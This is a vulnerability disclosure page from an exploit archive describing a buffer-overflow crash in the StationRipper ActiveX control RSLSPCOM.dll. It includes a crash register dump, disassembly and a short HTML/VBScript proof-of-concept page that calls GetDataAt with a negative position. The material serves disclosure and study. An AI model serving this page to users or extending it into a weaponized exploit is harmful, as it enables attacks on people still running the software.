stationripper ActiveX (RSLSPCOM.dll) Buffer Overflow PoC

2012.07.21
Credit: coolkaveh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC Date: July 19, 2012 Author: coolkaveh coolkaveh () rocketmail com Https://twitter.com/coolkaveh Vendor Homepage: www.stationripper.com Version: 2.98.3/1 Tested on: windows XP SP3 --------------------------------------------------------------------------------------- cheers to awesome hippie flaw hunter --------------------------------------------------------------------------------------- Class SSLDataContainer GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704} GetDataAt Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ EIP 003B1191 EAX 00000000 EBX 003BB3BC -> 003B3904 ECX 003D2120 -> BAADF00D EDX 00000000 EDI FFFFFFFF ESI 00000000 EBP 0013EDA4 -> 0013EDCC ESP 0013ED64 -> 003BB3BC Block Disassembly: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3B1181 MOV DL,AL 3B1183 AND DL,F 3B1186 SHL DL,2 3B1189 OR [EBP+13],DL 3B118C SHR AL,4 3B118F MOV DL,AL 3B1191 MOV AL,[EDI] <--- CRASH 3B1193 MOV BL,AL 3B1195 AND BL,3 3B1198 SHL BL,4 3B119B OR DL,BL 3B119D SHR AL,2 3B11A0 MOV [EBP+F],AL 3B11A3 MOV EAX,[EBP-4] 3B11A6 SUB [EBP-8],EAX ArgDump: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ EBP+8 003D2120 -> BAADF00D EBP+12 FFFFFFFF EBP+16 00000001 EBP+20 00000005 EBP+24 00000001 EBP+28 00000000 <html> Exploit <object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object> <script language='vbscript'> targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll" prototype = "Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String" memberName = "GetDataAt" progid = "SSLHIJACKCLIENTCOMLib.SSLDataContainer" argCount = 2 arg1=-1 arg2=1 xpl.GetDataAt arg1 ,arg2 </script>

References:

https://twitter.com/coolkaveh


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top